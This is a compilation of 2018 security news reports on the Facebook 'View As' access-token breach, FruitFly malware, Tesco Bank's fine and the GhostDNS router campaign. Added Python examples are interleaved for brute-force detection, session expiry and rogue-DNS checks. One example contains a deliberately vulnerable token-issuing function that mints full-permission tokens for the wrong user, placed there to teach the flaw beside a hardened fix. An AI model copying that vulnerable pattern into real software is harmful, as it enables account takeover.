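The recommendation to log RDP logins only pays off if something reads those logs for the pattern the alert describes: unlimited guesses against weak passwords on an exposed port. The following detection, added here as an example and not part of the FBI/DHS alert, groups Windows Security events by source, counts RemoteInteractive (RDP) failures inside a sliding window and notes whether a success from the same source followed the burst. Event IDs 4625/4624 and logon type 10 are real Windows values; the log lines, addresses and account names are constructed.

```python
from collections import defaultdict
from typing import Dict, List, NamedTuple

# Real Windows Security log values: 4625 = failed logon, 4624 = successful
# logon, logon type 10 = RemoteInteractive (RDP). The events below are
# constructed for this example; fields are: epoch seconds, event id,
# logon type, source IP, account name.
SAMPLE_EVENTS = """\
1538400000 4625 10 203.0.113.7 administrator
1538400020 4625 10 203.0.113.7 administrator
1538400041 4625 10 203.0.113.7 admin
1538400063 4625 10 203.0.113.7 backup
1538400085 4625 10 203.0.113.7 backup
1538400110 4624 10 203.0.113.7 backup
1538400500 4625 10 198.51.100.4 jsmith
1538400530 4624 10 198.51.100.4 jsmith
1538401000 4625 3 192.0.2.55 svc_share
1538401001 4625 3 192.0.2.55 svc_share
1538401002 4625 3 192.0.2.55 svc_share
1538401003 4625 3 192.0.2.55 svc_share
1538401004 4625 3 192.0.2.55 svc_share
1538402000 4625 10 198.51.100.9 jdoe
1538405000 4625 10 198.51.100.9 jdoe
1538408000 4625 10 198.51.100.9 jdoe
1538411000 4625 10 198.51.100.9 jdoe
1538414000 4625 10 198.51.100.9 jdoe
"""


class Event(NamedTuple):
    ts: int
    event_id: int
    logon_type: int
    source_ip: str
    user: str


def parse_events(text: str) -> List[Event]:
    """Parse the constructed whitespace-separated event lines."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, ltype, ip, user = line.split()
        events.append(Event(int(ts), int(eid), int(ltype), ip, user))
    return events


def find_rdp_bruteforce(events: List[Event], threshold: int = 5,
                        window: int = 300) -> List[Dict[str, object]]:
    """One alert per source that produced >= threshold RDP logon failures
    inside any `window`-second span; records whether an RDP success from
    the same source followed the burst (a guess that landed).
    Network logons (type 3, e.g. SMB) are ignored so that share noise
    does not masquerade as RDP guessing; slow, spread-out failures that
    never fit the window do not alert either."""
    by_ip: Dict[str, List[Event]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.logon_type == 10 and ev.event_id in (4624, 4625):
            by_ip[ev.source_ip].append(ev)

    alerts: List[Dict[str, object]] = []
    for ip, evs in by_ip.items():
        failures = [e for e in evs if e.event_id == 4625]
        start = 0
        for end in range(len(failures)):
            # Slide the window start forward until the span fits.
            while failures[end].ts - failures[start].ts > window:
                start += 1
            if end - start + 1 >= threshold:
                burst = failures[start:end + 1]
                landed = next((e for e in evs if e.event_id == 4624
                               and e.ts >= burst[-1].ts), None)
                alerts.append({
                    "source_ip": ip,
                    "failures": len(burst),
                    "users_tried": sorted({e.user for e in burst}),
                    "succeeded_as": landed.user if landed else None,
                })
                break  # one alert per source is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in find_rdp_bruteforce(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

A real deployment would read these fields from the 4624/4625 event XML (TargetUserName, IpAddress, LogonType) rather than from a flat text line, and would feed an alert with a non-empty `succeeded_as` straight to incident response.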


Industry Reactions to Facebook Hack
2.10.2018 securityweek
Social

Facebook revealed last week that malicious actors may have obtained access tokens for 50 million accounts after exploiting several bugs related to the “View As” feature and a video uploader introduced last year.

The breach was discovered last week following an investigation triggered by a traffic spike observed on September 16. Facebook says it has patched the vulnerability and there is no evidence that the compromised access tokens have been misused.

The incident, the latest in a series of security and privacy scandals involving the social media giant, could have serious repercussions for Facebook. The company’s stock went down, and it faces probes by government authorities, class action lawsuits, and a fine that could exceed $1.6 billion.

Industry professionals have commented on various aspects of the incident, including GDPR implications, the impact on Facebook and its users, the vulnerabilities exploited by the attackers, and the company’s response.

And the feedback begins...

Jeannie Warner, security manager, WhiteHat Security:

“What the hackers accessed is interesting to me– information about the accounts having to do with user data rather than financial. This really underscores the new value currency of privacy and personally identifiable information, which includes demographics like gender, hometown, name, age (birthdate) and anything else a person has under their ‘About’ tab. After the misuse of personal information by Cambridge Analytica, one starts to speculate that the same information is being harvested for similar militant bot and troll activity online, especially heading toward elections and other significant activities. Sometimes why hackers go in and what is taken can give clues as to who the hackers might be – in this case, I can speculate at a probable nation state or other political group data harvesting operation.

How it was detected is also interesting – user logins increased dramatically last December. Companies looking to assemble evidence of attack or compromise can look at user behavior and traffic patterns changing as evidence of ‘something different’ that requires investigation. The OWASP Top 10 Risks for Web Application Security Risks was updated a month before the traffic pattern was noticed last December 2017, adding a new item: A10 Insufficient Logging and Monitoring. This attack and the length of time it went undetected and verified represents the truth of that rating and inclusion as a major risk.”

Rahul Kashyap, CEO, Awake Security:

“The immediate challenge for Facebook is going to be identifying what accounts were touched, compared to which ones were truly compromised. The 50 million number could change as we often have seen with past breaches. But it is quite likely a subset of those were specifically taken over.

What will be revealing is whether there is a pattern to whose accounts were being targeted, and whether that pattern will help reveal the identity of the attackers. Facebook knows what it knows now, but there’s always the possibility that attackers were able to get to more information. The large numbers in this breach could just be a decoy if threat actors were targeting specific individuals.”

Eric Sheridan, chief scientist, WhiteHat Security:

“One of the best proactive strategies in reducing the risk of introducing vulnerabilities in applications is the enumeration and systemic adoption of ‘secure design patterns.’ While they may be unique to each organization and perhaps each application, secure design patterns help solidify those code level patterns that developers must adhere to in order to ward off the introduction of exploitable vulnerabilities.

Facebook looks to have been exploited as a result of a Direct Object Reference, whereby an attacker could modify an ‘id’ parameter in order to access unauthorized user information. In this case, a secure design pattern dictating the use of a façade known to enforce data layer security constraints could be adopted to mitigate such vulnerabilities. The adoption of a secure design pattern is not enough, however. We need automation to help enforce the use of the secure design pattern at scale, which presents its own set of challenges.”

Dan Pitman, Principal Security Architect, Alert Logic:

“New features increase the risk that vulnerabilities like this can become part of the live application and Facebook are known to implement new features at a high rate, having been acknowledged as the leader in agile web development practices in the past.

This 'continuous delivery' of new features combined with the modular nature of that delivery increases risk that vulnerabilities like this can become part of the live application. Testing all of the myriad combinations of the sometimes hundreds of components, or modules, that can interact is the challenge. The applications are made up of components built by different developers at different times working based on older best practices, all of this means that vulnerabilities are an inevitability. In Facebook’s case there will be people working hard to identify flaws in both trenches and this time the attackers got there first.”

Matthew Maglieri, CISO, Ashley Madison:

“These types of incidents serve as a reminder that no organization is immune to cyber threats. Facebook is at the forefront of web application security and have an incredibly talented team dedicated to protecting the security and privacy of their users.

As a professional who has worked with companies around the world to enhance and build their cybersecurity programs, I would say that we need to learn from incidents like these and not rush to judge companies like Facebook.

And while we must hold each other accountable for these incidents, we also need to help each other up, to avoid belittling our peers who have gone through the worst, and to share what we know so that others can improve. If we don’t, we’ll only be preventing the open and honest dialogue necessary for our collective success.”

Pravin Kothari, CEO, CipherCloud:

“The real $50 million dollar question is who did this impact, exactly? Do any of those 50 million customers impacted reside in the European Community? If so, will this fall under GDPR and how will it be treated? Enforcement of GDPR will come from the Information Commissioner’s Office (ICO). What will their reaction be? Given the horrendous publicity from the Cambridge Analytica data exposures, the EU reaction is not easily predicted. Not knowing all of the detail of when the breach was discovered, who, exactly was impacted, who was responsible, etc., the possible outcomes may be worse than we know today. We’ll have to see what Facebook discloses about potential liability if any exists. The calculations of the potential fines under GDPR are a bit mind-boggling with any possible impact to millions of users.”

Dr. Richard Ford, Chief Scientist, Forcepoint:

“First, I think it’s great that Facebook appears to have reacted so quickly, as it’s a sign of the growing maturity around breach response that we’re starting to see as GDPR comes into effect. Understanding if there was a pattern to the impacted accounts versus just random selection is the difference between someone trying to hack the system for fun or a coordinated nation-state attack that compromises specific users to ultimately gain access to sensitive data.

This breach illustrates a fundamental truth of the new digital economy: when I share my personal data with a company I am putting my trust in your ability to protect that data adequately. Users need to continually evaluate the type of data they share and the potential impact a breach of that data could cause, to become an active participant in protecting their own online identities. On the other side, companies need to avail themselves of proactive technologies such as behavioral analysis to hold up their end of the bargain.”

Greg Foss, senior manager of Threat Research, LogRhythm:

“The view-as feature within Facebook’s platform, while well-intentioned, is difficult to implement programmatically, in that you are viewing your account as another individual – essentially a light version of account impersonation. When implemented properly, you’re given a specific view of an account based on what is programmatically known about the account you’re viewing from.

Based on information available, a video uploading feature implemented in July of last year exposed this feature to a flaw that allowed attackers to impersonate other user accounts and effectively obtain full access to their Facebook profiles. It appears that attackers are able to access the accounts of ‘friends’ or those already connected to the compromised account.

If that’s true, it may be possible to trace the attacks back to a single point of origin, given the nature of how the attack spreads to other accounts. That said, the origin account will most likely not be that of a real Facebook user, so determining an individual or group behind this will take some digging.”

Chester Wisniewski, Principal Research Scientist, Sophos:

“In something as big and complicated as Facebook, there are bound to be bugs. The theft of these authorization tokens is certainly a problem, but not nearly as big of a risk to users' privacy as other data breaches we have heard about or even Cambridge Analytica for that matter.

As with any social media platform, users should assume their information may be made public, through hacking or simply through accidental oversharing. This is why sensitive information should never be shared through these platforms. For now, logging out and back in is all that is necessary. The truly concerned should use this as a reminder and an opportunity to review all of their security and privacy settings on Facebook and all other social media platforms they share personal information with.”

Adam Levin, Founder, CyberScout:

“Facebook has had a hard year, and it just got worse. In a world dominated by trillion-dollar advertising platforms consisting of multi-billion member communities, 50 million users may no longer seem like a big deal, but it is. The number of people affected by this breach is roughly equal to the entire population of the west coast of the United States. Just because you are secure at 9:01 does not mean that will still be the case at 9:02. The latest Facebook breach was caused by an upgrade. The takeaway is simple: Any changes made to networks, software and other systems must be immediately and continually tested and monitored for vulnerabilities that may have been caused in the process. The traditional "patch and pray" approach to cybersecurity is obsolete. An effective vulnerability management program is crucial.”

Satya Gupta, chief technology officer and co-founder of Virsec:

“While the “View As” feature sounds like a useful way to see what your profile looks like to your ex-girlfriend, it was clearly built without thinking through security. Instead of just seeing through someone else’s eyes, Facebook essentially lets you borrow their identity. Armed with someone else’s access token you can get to lots of private and highly privileged information. In addition, millions of people use their Facebook ID (authenticated through their access tokens) to connect to other services where they might be storing files, making purchases, or doing other things that they thought were private. Facebook claims to not know what these 50 million access tokens are being used for; you can bet that the thieves have found them to be very valuable.

These problems could easily have been avoided and services that prioritize security, like banks, hospitals and even airlines rarely make these basic mistakes. It’s a bad idea to let users stay logged on indefinitely while there is no activity. Many people will open a Facebook browser tab and not close it for hours or days while doing other things. If you’re logged into your banking site and are inactive for more than a few minutes you are automatically logged off and need to re-authenticate. This is a small burden for users and a no-brainer for security. There are also solutions that provide continuous authentication requiring users to confirm their identity if there is any unusual behavior.”
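The idle-logout practice mentioned in the quote above, as an added example written for this page (it is not Facebook's code or any product's code): a server-side session store that expires a session after a period of inactivity and, independently, after an absolute lifetime, and that can revoke every session of a user at once, which is the shape of the "reset all tokens" response described elsewhere in the article. The 15-minute idle window, the 12-hour absolute lifetime and the injectable clock are assumptions chosen for the illustration.

```python
"""Session store with an inactivity timeout and an absolute lifetime.

Added example, not code from the original page. The timeout values and the
clock injection are assumptions made for this illustration.
"""
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional

IDLE_TIMEOUT = 15 * 60          # assumed: log out after 15 minutes without activity
ABSOLUTE_LIFETIME = 12 * 3600   # assumed: force re-authentication after 12 hours


@dataclass
class Session:
    user: str
    created_at: float
    last_seen: float


class SessionStore:
    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self._clock = clock                      # injectable so tests can advance time
        self._sessions: Dict[str, Session] = {}

    def create(self, user: str) -> str:
        """Start a session and return its identifier (256 bits of randomness)."""
        sid = secrets.token_urlsafe(32)
        now = self._clock()
        self._sessions[sid] = Session(user=user, created_at=now, last_seen=now)
        return sid

    def validate(self, sid: str) -> Optional[str]:
        """Return the session's user if it is live, else None.

        A successful check counts as activity and refreshes the idle timer; an
        expired session is deleted server-side, not merely left to the cookie.
        """
        s = self._sessions.get(sid)
        if s is None:
            return None
        now = self._clock()
        idle_expired = now - s.last_seen > IDLE_TIMEOUT
        lifetime_expired = now - s.created_at > ABSOLUTE_LIFETIME
        if idle_expired or lifetime_expired:
            del self._sessions[sid]
            return None
        s.last_seen = now
        return s.user

    def revoke(self, sid: str) -> None:
        """Explicit logout."""
        self._sessions.pop(sid, None)

    def revoke_all_for(self, user: str) -> int:
        """Revoke every session of one user; returns how many were dropped."""
        dead = [sid for sid, s in self._sessions.items() if s.user == user]
        for sid in dead:
            del self._sessions[sid]
        return len(dead)
```

Two independent limits are used on purpose: the idle timeout catches the forgotten browser tab the quote describes, while the absolute lifetime bounds how long a stolen identifier stays useful even when the attacker keeps it active.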

Dawn Song, CEO, Oasis Labs:

“Today’s breach confirms a critical trend: it's nearly impossible for major tech companies to protect data with existing technologies. It's time to start looking at new solutions like blockchain to defend user privacy.”


Weak Passwords Abused for 'FruitFly' Mac Malware Distribution
2.10.2018 securityweek
Apple

FruitFly, a piece of Mac malware that infected thousands of machines over the course of more than 13 years, was being distributed via poorly protected external services.

First detailed in early 2017, FruitFly (also known as Quimitchin) targeted individuals, companies, schools, a police department, and the U.S. government, including a computer owned by a subsidiary of the Department of Energy.

In January this year, the U.S. Department of Justice indicted Phillip R. Durachinsky, an Ohio resident, for using the malware for more than 13 years for nefarious purposes. The man would abuse FruitFly to steal personal data of unknowing victims and spy on them, and even to produce child pornography.

Durachinsky allegedly leveraged the malware to control the infected machines “by accessing stored data, uploading files, taking and downloading screenshots, logging a user’s keystrokes, and turning on the camera and microphone to surreptitiously record images and audio,” the DoJ said in January.

While the threat’s capabilities were clear to the researchers who analyzed it, the only thing they couldn’t explain was the infection vector.

A newly discovered “flash alert” (PDF) that the Federal Bureau of Investigation (FBI) sent in March last year, however, solves the mystery: Durachinsky targeted poorly protected external services to install the malware onto his victims’ machines.

“The attack vector included the scanning and identification of externally facing Mac services to include the Apple Filing Protocol (AFP, port 548), RDP, VNC, SSH (port 22), and Back to My Mac (BTMM), which would be targeted with weak passwords or passwords derived from 3rd party data breaches,” the alert reads.

Discovered by Patrick Wardle, co-founder and chief research officer of enterprise macOS security company Digita Security, the document reveals that, in addition to using the malware to spy on victims, Durachinsky was leveraging the infection to target additional systems.

Basically, he scanned the Internet for Macs with exposed ports that he could exploit and then attempted to connect to these systems using weak, known credentials. Once a system was compromised, he then attempted to persistently install the malware.

The targeting of poorly protected remote access protocols for malware installation isn’t a new technique. In fact, there are millions of endpoints exposing ports associated with the Remote Desktop Protocol (RDP) and this type of attack even surpassed spam in popularity among ransomware operators.
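The infection vector described above (exposed remote-access services probed with weak or breached credentials) is something a defender can spot in authentication logs. The following is an added example written for this page, not the FBI's or any vendor's code: it parses OpenSSH-style sshd log lines, counts failed logins per source address, lists the usernames each source tried, and flags a successful login that follows a run of failures from the same source. The log lines are constructed samples using documentation address ranges, and the threshold of five failures is an assumption.

```python
"""Brute-force / credential-stuffing detection over sshd log lines.

Added example, not from the original page. SAMPLE_AUTH_LOG is constructed;
the detection threshold is an assumption.
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Set, Tuple

# OpenSSH's two common outcome messages.
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED = re.compile(r"Accepted (?:password|publickey) for (\S+) from (\S+) port \d+")

# Constructed sample: one source guesses several accounts and finally gets in;
# another source is a user who mistyped a password once.
SAMPLE_AUTH_LOG = """\
Oct  2 03:14:01 macbox sshd[511]: Failed password for invalid user admin from 198.51.100.7 port 40122 ssh2
Oct  2 03:14:03 macbox sshd[512]: Failed password for root from 198.51.100.7 port 40130 ssh2
Oct  2 03:14:05 macbox sshd[513]: Failed password for invalid user pi from 198.51.100.7 port 40138 ssh2
Oct  2 03:14:07 macbox sshd[514]: Failed password for invalid user test from 198.51.100.7 port 40142 ssh2
Oct  2 03:14:09 macbox sshd[515]: Failed password for alice from 198.51.100.7 port 40150 ssh2
Oct  2 03:14:11 macbox sshd[516]: Failed password for alice from 198.51.100.7 port 40158 ssh2
Oct  2 03:14:13 macbox sshd[517]: Accepted password for alice from 198.51.100.7 port 40166 ssh2
Oct  2 08:02:40 macbox sshd[640]: Failed password for bob from 203.0.113.20 port 51002 ssh2
Oct  2 08:02:47 macbox sshd[641]: Accepted publickey for bob from 203.0.113.20 port 51010 ssh2
"""


def analyze(lines: Iterable[str], threshold: int = 5) -> dict:
    """Return brute-forcing sources, the usernames they tried, and logins that
    succeeded after at least `threshold` failures from the same source."""
    failures: Dict[str, int] = defaultdict(int)
    usernames: Dict[str, Set[str]] = defaultdict(set)
    suspicious_logins: List[Tuple[str, str]] = []
    for line in lines:
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            failures[ip] += 1
            usernames[ip].add(user)
            continue
        m = ACCEPTED.search(line)
        if m:
            user, ip = m.groups()
            # A success right after a burst of failures is the event to alert on.
            if failures.get(ip, 0) >= threshold:
                suspicious_logins.append((ip, user))
    brute_forcers = {ip: n for ip, n in failures.items() if n >= threshold}
    return {
        "brute_forcers": brute_forcers,
        "usernames_tried": {ip: sorted(usernames[ip]) for ip in brute_forcers},
        "suspicious_logins": suspicious_logins,
    }


def analyze_text(text: str, threshold: int = 5) -> dict:
    return analyze(text.splitlines(), threshold)
```

In practice the same logic runs over `/var/log/auth.log` or `journalctl -u ssh` output; the "success after failures" finding is the one worth paging on, since a plain failure burst against an Internet-facing port is background noise.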


FCA fines Tesco Bank £16.4m over 2016 cyber attack
2.10.2018 securityaffairs
Attack

Tesco Bank agreed to pay £16.4m as part of a settlement with the Financial Conduct Authority following the 2016 security breach.
The Financial Conduct Authority (FCA) has imposed a £16.4m fine on Tesco Bank over the weaknesses in its systems that hackers exploited to steal millions of pounds from customers’ online accounts in 2016.

In November 2016, Tesco Bank halted all online transactions after a cyber heist affected thousands of its customers. An investigation is ongoing.

The suspension was announced by chief executive Benny Higgins; at the time the bank admitted that 40,000 of its 136,000 current banking customers had their accounts hacked, and that 50 percent of them had lost money.

According to the financial institution, hackers stole £2.26m from 9,000 customer accounts over a 48-hour period. Most of the fraudulent transactions were made in Brazil and relied on magnetic stripe rules.

The bank was fined because it was not able to demonstrate “due skill, care and diligence” in protecting customers’ accounts from cyber attacks.

“The fine the FCA imposed on Tesco Bank today reflects the fact that the FCA has no tolerance for banks that fail to protect customers from foreseeable risks.” said Mark Steward, the executive director of enforcement and market oversight at the FCA.

“In this case, the attack was the subject of a very specific warning that Tesco Bank did not properly address until after the attack started. This was too little, too late. Customers should not have been exposed to the risk at all. Banks must ensure that their financial crime systems and the individuals who design and operate them work to substantially reduce the risk of such attacks occurring in the first place.”

“The standard is one of resilience, reducing the risk of a successful cyber-attack occurring in the first place, not only reacting to an attack.”

Tesco Bank was alerted by Visa one year before the cyber attack, but failed to apply the necessary countermeasures.

According to the FCA, Tesco Bank breached Principle 2 because it failed to exercise due skill, care and diligence to:

Design and distribute its debit card.
Configure specific authentication and fraud detection rules.
Take appropriate action to prevent the foreseeable risk of fraud.
Respond to the November 2016 cyber attack with sufficient rigour, skill and urgency.
According to the FCA, hackers used an algorithm to generate valid debit card numbers that were involved in fraudulent transactions.

Tesco Bank provided all the necessary support to the FCA and fully compensated customers, it was also able to halt a significant percentage of unauthorized transactions.

The FCA praised the bank’s post-incident efforts to limit the exposure of its customers and granted it 30% credit for mitigation. Tesco Bank also agreed to an early settlement, which qualified it for a 30% (Stage 1) discount under the FCA’s executive settlement procedure.

“Tesco Bank provided a high level of cooperation to the FCA. Through a combination of this level of cooperation, its comprehensive redress programme which fully compensated customers, and in acknowledgment that it stopped a significant percentage of unauthorised transactions, the FCA granted the bank 30% credit for mitigation.” continues the FCA.

“In addition, Tesco Bank agreed to an early settlement of this matter which qualified for a 30% (Stage 1) discount under the FCA’s executive settlement procedure. But for the mitigation credit and the Stage 1 discount, the FCA would have imposed a penalty of £33,562,400.”


GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers
2.10.2018 securityaffairs
Virus

Security experts from Qihoo 360 NetLab spotted GhostDNS, a malware that already infected over 100K+ devices and targets 70+ different types of routers
Security experts from Qihoo 360 NetLab have uncovered an ongoing hacking campaign that leverages the GhostDNS malware. Attackers have already hijacked over 100,000 home routers; the malicious code modifies the routers’ DNS settings to hijack traffic and redirect users to phishing websites.

Between September 21 and 27, the GhostDNS campaign compromised more than 100,000 routers, most of them (87.8%) located in Brazil.

GhostDNS reminds us of the infamous DNSChanger malware, which made the headlines for its ability to change DNS settings on the infected device.

GhostDNS scans for the IP addresses of routers protected by weak or no passwords, accesses them, and changes their DNS settings to point at a rogue DNS server operated by the attackers.

“Just like the regular dnschanger, this campaign attempts to guess the password on the router’s web authentication page or bypass the authentication through the dnscfg.cgi exploit, then changes the router’s default DNS address to the Rogue DNS Server[3]through the corresponding DNS configuration interface.” reads the analysis published by the experts.

“But this campaign has more, we have found three related DNSChanger programs, which we call Shell DNSChanger, Js DNSChanger and PyPhp DNSChanger according to their programming languages.”

GhostDNS has a modular structure composed of four components:

1) DNSChanger module: the main module, designed to exploit targeted routers. It has three sub-modules, dubbed Shell DNSChanger, Js DNSChanger and PyPhp DNSChanger:

   1.1) Shell DNSChanger is written in shell script and combines 25 Shell scripts that allow the malware to carry out brute-force attacks on routers or firmware packages from 21 different manufacturers.
   1.2) Js DNSChanger is written in JavaScript and includes 10 attack scripts designed to infect 6 routers or firmware packages. It includes scanners, payload generators and attack programs. The Js DNSChanger program is usually injected into phishing websites, so it works together with the Phishing Web System.
   1.3) PyPhp DNSChanger is written in Python and PHP and contains 69 attack scripts designed to target 47 different routers/firmware. The component has been found deployed on over 100 servers, most of them on Google Cloud, and includes functionality such as a Web API, a scanner and an attack module. Experts believe this sub-module is the core module of DNSChanger that allows attackers to scan the Internet for vulnerable routers.

2) Web Admin module: experts believe it implements an admin panel for the attackers, secured with a login page.

3) Rogue DNS module: the module resolves targeted domain names to attacker-controlled web servers. At the time of the investigation the experts had no access to the Rogue DNS server, so it was not possible to know the exact number of DNS entries used to hijack legitimate domains.

4) Phishing Web module: the module implements phishing pages for the domains targeted in this campaign.

Attackers appear to be focused on Brazil, where they mainly targeted major banks.

“Currently the campaign mainly focuses on Brazil, we have counted 100k+ infected router IP addresses (87.8% located in Brazil), and 70+ router/firmware have been involved, and 50+ domain names such as some big banks in Brazil, even Netflix, Citibank.br have been hijacked to steal the corresponding website login credentials,” continues the researchers.

Experts warn of the threat the GhostDNS malware poses to Internet users due to its scalability and the availability of multiple attack vectors.

Further details, including IoCs, are reported in the analysis published by Qihoo 360 NetLab.
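A home or small-office network can check for exactly the kind of tampering the Rogue DNS module performs. The following is an added example written for this page, not NetLab's code: it reads the resolver addresses from a router's DNS settings, reports any that fall outside an allow-list of the ISP's resolvers, and compares the answers obtained through the router for high-value domains with those from a trusted resolver queried independently (for example over DNS-over-HTTPS from outside the LAN). The allow-list, the domains, the router dump and all addresses are constructed samples from documentation ranges; replace them with real data before use.

```python
"""Rogue-resolver and DNS-hijack check for a home router.

Added example, not code from the original page or from NetLab. All addresses,
domains and the router dump below are constructed samples.
"""
import ipaddress
from typing import Dict, Iterable, List, Set

# Constructed: the resolver ranges the ISP legitimately uses.
ISP_RESOLVER_ALLOWLIST = ["203.0.113.0/24", "2001:db8:53::/48"]

# Constructed dump of a router's DNS settings in resolv.conf style.
ROUTER_DNS_SETTINGS = """\
# DNS servers as configured on the router
nameserver 198.51.100.250
nameserver 203.0.113.53
"""

# Constructed: answers from a trusted resolver reached independently of the router.
TRUSTED_ANSWERS: Dict[str, Set[str]] = {
    "bank.example": {"203.0.113.10", "203.0.113.11"},
    "www.netflix.example": {"203.0.113.60"},
}
# Constructed: answers obtained through the router's configured resolvers.
ROUTER_ANSWERS: Dict[str, Set[str]] = {
    "bank.example": {"198.51.100.77"},          # differs: a phishing host
    "www.netflix.example": {"203.0.113.60"},
}


def parse_nameservers(text: str) -> List[str]:
    """Extract 'nameserver <addr>' entries, ignoring comments and blank lines."""
    servers = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        parts = line.split()
        if len(parts) == 2 and parts[0] == "nameserver":
            servers.append(parts[1])
    return servers


def resolvers_outside_allowlist(servers: Iterable[str], allowlist: Iterable[str]) -> List[str]:
    """Configured resolvers that are not inside any allowed network."""
    nets = [ipaddress.ip_network(n) for n in allowlist]
    rogue = []
    for s in servers:
        try:
            addr = ipaddress.ip_address(s)
        except ValueError:
            rogue.append(s)          # not even an address: treat as suspicious
            continue
        if not any(addr in n for n in nets):   # v4/v6 mismatch simply yields False
            rogue.append(s)
    return rogue


def hijacked_domains(router: Dict[str, Set[str]], trusted: Dict[str, Set[str]]) -> Dict[str, Set[str]]:
    """Domains whose router-resolved addresses are absent from the trusted answers.

    CDN round-robin is tolerated: an answer is reported only if the trusted
    resolver never returned it, so a legitimate subset of addresses is fine."""
    findings: Dict[str, Set[str]] = {}
    for domain, trusted_set in trusted.items():
        unexpected = router.get(domain, set()) - trusted_set
        if unexpected:
            findings[domain] = unexpected
    return findings


def audit() -> dict:
    servers = parse_nameservers(ROUTER_DNS_SETTINGS)
    return {
        "configured": servers,
        "rogue_resolvers": resolvers_outside_allowlist(servers, ISP_RESOLVER_ALLOWLIST),
        "hijacked": hijacked_domains(ROUTER_ANSWERS, TRUSTED_ANSWERS),
    }
```

The resolver allow-list check is the cheaper signal and catches the campaign's primary action (rewriting the router's DNS servers); the answer comparison catches the case where an attacker keeps the configured addresses but intercepts port 53 upstream.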


Several Bugs Exploited in Massive Facebook Hack
1.10.2018 securityaffairs
Social  Vulnerability

Facebook Shares More Details on Hack Affecting 50 Million Accounts

Facebook has shared additional details about the hacker attack affecting 50 million accounts, including technical information and what its investigation has uncovered so far.

The social media giant announced on Friday that malicious actors exploited a vulnerability related to the “View As” feature to steal access tokens that could have been leveraged to hijack accounts. The tokens of nearly 50 million users have been compromised.

The tokens of these users have been reset to prevent abuse, along with the tokens of 40 million others who may be at risk due to the fact that they were subject to a View As lookup in the past year – impacted users will need to log back in to their accounts. The problematic feature has been suspended until a security review is conducted.

Technical details on Facebook hack

The “View As” feature shows users how others see their profile. This is a privacy feature designed to help users ensure that they only share information and content with the intended audience.

The vulnerability that exposed access tokens involved a combination of three distinct bugs affecting the “View As” feature and a version of Facebook’s video uploader interface introduced in July 2017.

When “View As” is used, the profile should be displayed as a read-only interface. However, the text box that allows people to wish happy birthday to their friends erroneously allowed users to post a video – this was the first bug.

When posting a video in the affected box, the video uploader generated an access token that had the permissions of the Facebook mobile app – this was the second bug as the video uploader should not have generated a token at this point.

The third and final problem was that the generated token was not for the user who had been using “View As” but for the individual whose profile was being looked up.

Hackers could obtain the token from the page’s HTML code and use it to access the targeted user’s account. An attacker would first have to target one of their friends’ accounts and move from there to other accounts. The attack did not require any user interaction.

“The attackers were then able to pivot from that access token to other accounts, performing the same actions and obtaining further access tokens,” explained Pedro Canahuati, VP of Engineering, Security and Privacy at Facebook.
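The three bugs above reduce to one token-issuance mistake: a privileged token minted in a context that should have produced nothing, with the wrong subject. The following is an added example written for this page, a simplified model and not Facebook's code: a signed-token issuer that reproduces the vulnerable behaviour beside a hardened version that refuses to mint anything in the read-only "View As" context and otherwise binds the token to the authenticated session with a narrow scope. The function names, the claim names `sub` and `scope`, the scope strings and the HMAC token format are assumptions made for the illustration.

```python
"""Vulnerable vs. hardened token issuance modelled on the "View As" bug chain.

Added example, not Facebook's code. Function names, claim names, scope strings
and the token format are assumptions for this illustration.
"""
import base64
import hashlib
import hashlib as _h  # noqa: F401  (kept explicit: only hashlib.sha256 is used)
import hmac
import json
import secrets

# Server-side signing key; random per process for the example (a service would
# load it from a secret store).
SIGNING_KEY = secrets.token_bytes(32)


class TokenIssueDenied(Exception):
    pass


def _sign(claims: dict) -> str:
    """Encode claims and append an HMAC-SHA256 tag: <b64(body)>.<hex(tag)>."""
    body = json.dumps(claims, sort_keys=True).encode()
    tag = hmac.new(SIGNING_KEY, body, hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(body).decode() + "." + tag


def verify(token: str) -> dict:
    """Return the claims of a token with a valid tag, or raise ValueError."""
    body_b64, tag = token.rsplit(".", 1)
    body = base64.urlsafe_b64decode(body_b64)
    expected = hmac.new(SIGNING_KEY, body, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        raise ValueError("bad signature")
    return json.loads(body)


def vulnerable_issue_upload_token(session_user: str, viewed_user: str, view_as: bool) -> str:
    """The behaviour the article describes, kept deliberately.

    Bug 1: the uploader is reachable from the read-only View As page.
    Bug 2: a token with the mobile app's full permissions is minted there.
    Bug 3: its subject is the profile being looked at, not the logged-in user.
    """
    subject = viewed_user if view_as else session_user
    return _sign({"sub": subject, "scope": "mobile_app_full"})


def hardened_issue_upload_token(session_user: str, viewed_user: str, view_as: bool) -> str:
    """Read-only contexts mint nothing; otherwise the token is bound to the
    authenticated session and carries only the scope the uploader needs."""
    if view_as:
        raise TokenIssueDenied("View As is a read-only preview; no token may be issued here")
    return _sign({"sub": session_user, "scope": "video_upload"})


def can_read_inbox(token: str, target_user: str) -> bool:
    """Check a downstream API would apply: valid tag, subject matches the
    account being read, and the scope covers inbox access."""
    try:
        claims = verify(token)
    except ValueError:
        return False
    return claims["sub"] == target_user and claims["scope"] == "mobile_app_full"
```

The two defences are independent: refusing to mint in the read-only context closes the specific chain, while binding the subject to the session and narrowing the scope means that a future mistake of the same shape yields a token that cannot reach another user's data.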

Users and information affected by the breach

Facebook says the vulnerability has been patched. The social media giant claims that while the attackers did try to query its APIs to access profile information – such as name, gender and hometown – there is no evidence that any private information was actually accessed.

Facebook’s investigation continues, but the company says it has found no evidence that the attackers accessed private messages or credit card information.

Facebook says impacted users are from all around the world – it does not appear that the attack was aimed at a specific country or region. It’s worth noting that Facebook founder and CEO, Mark Zuckerberg, and Sheryl Sandberg, the company’s COO, were among those affected.

